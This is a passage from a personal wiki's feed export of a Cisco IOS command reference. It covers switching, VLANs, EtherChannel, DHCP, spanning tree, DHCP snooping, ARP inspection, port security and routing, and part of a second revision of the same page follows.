&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
Set the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages. &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Access / Trunk Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
Configures the interface as an access port and assigns it to VLAN 10.&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
Configures the interface as a trunk port using 802.1Q encapsulation.&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Trunk Allowed VLANs ===&lt;br /&gt;
Specifies which VLANs are allowed to traverse the trunk link.&lt;br /&gt;
 switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Native VLANs ===&lt;br /&gt;
Sets the native VLAN for untagged traffic on the trunk.&lt;br /&gt;
 switchport trunk native vlan 99&lt;br /&gt;
&lt;br /&gt;
=== Trunk Nonegotiate ===&lt;br /&gt;
Disables DTP (Dynamic Trunking Protocol) negotiation on the trunk interface.&lt;br /&gt;
 switchport nonegotiate&lt;br /&gt;
&lt;br /&gt;
== EtherChannel Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Active) ===&lt;br /&gt;
Configures interfaces to actively negotiate EtherChannel using LACP.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (LACP Passive) ===&lt;br /&gt;
Configures interfaces to respond to LACP negotiation.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode passive&lt;br /&gt;
&lt;br /&gt;
=== Create EtherChannel (On Mode) ===&lt;br /&gt;
Forces EtherChannel without negotiation protocol.&lt;br /&gt;
 interface range g0/1 - 2&lt;br /&gt;
  channel-group 1 mode on&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Access Port ===&lt;br /&gt;
Applies access configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport mode access&lt;br /&gt;
  switchport access vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Configure Port-Channel as Trunk ===&lt;br /&gt;
Applies trunk configuration to the logical Port-Channel interface.&lt;br /&gt;
 interface port-channel 1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify EtherChannel ===&lt;br /&gt;
Displays EtherChannel status and summary information.&lt;br /&gt;
 show etherchannel summary&lt;br /&gt;
&lt;br /&gt;
=== Verify Port-Channel Interface ===&lt;br /&gt;
Displays detailed information about the Port-Channel interface.&lt;br /&gt;
 show interfaces port-channel 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== DHCP ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a DHCP Server on a Cisco Router ===&lt;br /&gt;
Assigns IP addresses automatically to clients on a network.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 192.168.1.1 192.168.1.10&lt;br /&gt;
! Exclude addresses that should not be assigned dynamically&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool LAN_POOL&lt;br /&gt;
 network 192.168.1.0 255.255.255.0&lt;br /&gt;
 default-router 192.168.1.1&lt;br /&gt;
 dns-server 8.8.8.8 8.8.4.4&lt;br /&gt;
 lease 7&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;excluded-address&#039;&#039;: Prevents certain IPs from being assigned (like static IPs for servers or routers).  &lt;br /&gt;
* &#039;&#039;network&#039;&#039;: Defines the subnet for DHCP clients.  &lt;br /&gt;
* &#039;&#039;default-router&#039;&#039;: Sets the gateway IP for clients.  &lt;br /&gt;
* &#039;&#039;dns-server&#039;&#039;: Specifies DNS servers for clients.  &lt;br /&gt;
* &#039;&#039;lease&#039;&#039;: Duration the IP is valid (in days).  &lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Relay (IP Helper) ===&lt;br /&gt;
Forwards DHCP requests from clients to a remote DHCP server.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface GigabitEthernet0/1&lt;br /&gt;
 ip address 192.168.1.1 255.255.255.0&lt;br /&gt;
 ip helper-address 192.168.2.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;ip helper-address&#039;&#039;: IP of the DHCP server to forward requests to.  &lt;br /&gt;
* Needed when the server is on a different subnet.  &lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Status ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip dhcp binding      ! Shows assigned IP addresses&lt;br /&gt;
show ip dhcp pool         ! Shows pool usage and statistics&lt;br /&gt;
show running-config       ! Check DHCP configuration&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Best Practices ===&lt;br /&gt;
* Exclude static IP addresses from DHCP pools.  &lt;br /&gt;
* Use &#039;&#039;DHCP relay&#039;&#039; when clients and server are on different subnets.  &lt;br /&gt;
* Monitor DHCP bindings to prevent IP conflicts.&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
Dynamic ARP Inspection (DAI) is a security feature that validates ARP packets against a trusted database (typically built by DHCP Snooping) to prevent ARP spoofing and man-in-the-middle attacks. It intercepts ARP packets on untrusted ports, checks IP-to-MAC bindings, and drops invalid ones.&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled first (DAI uses the DHCP snooping binding table for validation).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
 ip arp inspection vlan 10,20   (alternative: range)&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches, routers, DHCP servers, or devices that should bypass DAI checks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
Trusted ports forward ARP packets without validation.&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust   (optional; this is the default)&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding/DoS attacks. Default is 15 pps on untrusted ports (exceeding this can put the port in err-disable).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15   (example: 15 packets per second)&lt;br /&gt;
  ip arp inspection limit rate 100 burst interval 1   (optional: higher rate with burst)&lt;br /&gt;
&lt;br /&gt;
=== Additional Validation Checks ===&lt;br /&gt;
By default, DAI validates only IP-to-MAC bindings from the DHCP snooping database. Enable extra checks (global config mode) to catch malformed ARP packets (highly recommended for stronger security).&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection validate src-mac&lt;br /&gt;
 ip arp inspection validate src-mac dst-mac ip   (common: enable all three)&lt;br /&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
* &#039;&#039;&#039;src-mac&#039;&#039;&#039; — Checks source MAC in Ethernet header vs. sender MAC in ARP body (for requests and replies).&lt;br /&gt;
* &#039;&#039;&#039;dst-mac&#039;&#039;&#039; — Checks destination MAC in Ethernet header vs. target MAC in ARP body (mainly for replies).&lt;br /&gt;
* &#039;&#039;&#039;ip&#039;&#039;&#039; — Checks for invalid/unexpected IP addresses (e.g., 0.0.0.0, 255.255.255.255, multicast IPs) in ARP body.&lt;br /&gt;
&lt;br /&gt;
Each new &amp;lt;code&amp;gt;ip arp inspection validate&amp;lt;/code&amp;gt; command &#039;&#039;&#039;overrides&#039;&#039;&#039; previous ones, so specify all desired options together.&lt;br /&gt;
&lt;br /&gt;
To disable: &amp;lt;code&amp;gt;no ip arp inspection validate [src-mac] [dst-mac] [ip]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan 10&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
 show ip arp inspection statistics   (shows drops, rate limit violations)&lt;br /&gt;
 show ip arp inspection log   (logs of dropped packets)&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table (enable with &amp;lt;code&amp;gt;ip dhcp snooping&amp;lt;/code&amp;gt; + &amp;lt;code&amp;gt;ip dhcp snooping vlan ...&amp;lt;/code&amp;gt;).&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies/packets (no validation or rate limiting).&lt;br /&gt;
* Access ports should remain &#039;&#039;&#039;untrusted&#039;&#039;&#039; to enforce checks.&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039; on access ports for loop/spanning-tree protection.&lt;br /&gt;
* For non-DHCP environments, use static ARP ACLs: &amp;lt;code&amp;gt;ip arp inspection filter arp-acl-name vlan 10&amp;lt;/code&amp;gt;.&lt;br /&gt;
* Often combined with &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039; (&amp;lt;code&amp;gt;ip verify source&amp;lt;/code&amp;gt;) on access ports to filter IP traffic based on the same bindings.&lt;br /&gt;
* Rate limiting helps prevent DoS; monitor with &amp;lt;code&amp;gt;show ip arp inspection statistics&amp;lt;/code&amp;gt; and consider &amp;lt;code&amp;gt;errdisable recovery cause arp-inspection&amp;lt;/code&amp;gt; for automatic port recovery.&lt;br /&gt;
* Additional validation (&amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;dst-mac&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt;) catches MAC spoofing or malformed packets beyond basic binding checks—enable at least &amp;lt;code&amp;gt;src-mac&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;ip&amp;lt;/code&amp;gt; in most production setups.&lt;br /&gt;
* DAI is ingress-only (checks incoming packets on untrusted ports).&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== View status of port security on an interface ===&lt;br /&gt;
 show port-security interface f0/1&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;br /&gt;
&lt;br /&gt;
= Routing =&lt;br /&gt;
&lt;br /&gt;
Routing is the process of forwarding packets between different networks using routing tables and routing protocols.&lt;br /&gt;
&lt;br /&gt;
=== Enable IP Routing (Layer 3 Switch) ===&lt;br /&gt;
Required on multilayer switches to allow routing between VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
== Static Routing ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a Static Route ===&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example using default administrative distance values listed in the section below.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
Manually define a path to a remote network. Here&#039;s an example manually defining the administrative distance&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1 10&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;next-hop-ip&amp;gt; &amp;lt;administrative distance (optional)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configure a Default Route / Default Gateway ===&lt;br /&gt;
Route used when no specific route matches the destination.&lt;br /&gt;
&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
 ipv6 route ::/0 2001:ABC:33:44::1&lt;br /&gt;
&lt;br /&gt;
== Administrative Distance ==&lt;br /&gt;
&lt;br /&gt;
Determines which route is preferred when multiple routes to the same destination exist.&lt;br /&gt;
&lt;br /&gt;
Common values:&lt;br /&gt;
 Connected – 0&lt;br /&gt;
 Static – 1&lt;br /&gt;
 EIGRP – 90&lt;br /&gt;
 OSPF – 110&lt;br /&gt;
 RIP – 120&lt;br /&gt;
&lt;br /&gt;
== Dynamic Routing ==&lt;br /&gt;
&lt;br /&gt;
Dynamic routing protocols automatically exchange routing information between routers.&lt;br /&gt;
&lt;br /&gt;
=== Configure RIP v2 ===&lt;br /&gt;
Uses hop count as metric (maximum 15 hops).&lt;br /&gt;
&lt;br /&gt;
 router rip&lt;br /&gt;
  version 2&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure EIGRP ===&lt;br /&gt;
Uses bandwidth and delay as composite metric.&lt;br /&gt;
&lt;br /&gt;
 router eigrp 100&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0 0.0.0.255&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure OSPF ===&lt;br /&gt;
Link-state protocol using cost as metric.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  network 192.168.1.0 0.0.0.255 area 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Route Summarization ==&lt;br /&gt;
&lt;br /&gt;
Route summarization (aggregation) reduces routing table size by advertising one route that represents multiple networks.&lt;br /&gt;
&lt;br /&gt;
Example networks:&lt;br /&gt;
 192.168.0.0/24&lt;br /&gt;
 192.168.1.0/24&lt;br /&gt;
 192.168.2.0/24&lt;br /&gt;
 192.168.3.0/24&lt;br /&gt;
&lt;br /&gt;
Can be summarized as:&lt;br /&gt;
 192.168.0.0/22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (EIGRP) ===&lt;br /&gt;
Applied on the outgoing interface.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0&lt;br /&gt;
  ip summary-address eigrp 100 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (OSPF ABR) ===&lt;br /&gt;
Configured under the OSPF process (on an ABR).&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  area 0 range 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Show Routing Information ==&lt;br /&gt;
&lt;br /&gt;
=== View Routing Table ===&lt;br /&gt;
&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Specific Route ===&lt;br /&gt;
&lt;br /&gt;
 show ip route 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Routing Protocol Information ===&lt;br /&gt;
&lt;br /&gt;
 show ip protocols&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1119</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1119"/>
		<updated>2026-02-23T22:26:15Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Configure a Static Route */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | exclude {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode (&amp;quot;elevate to root&amp;quot;) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
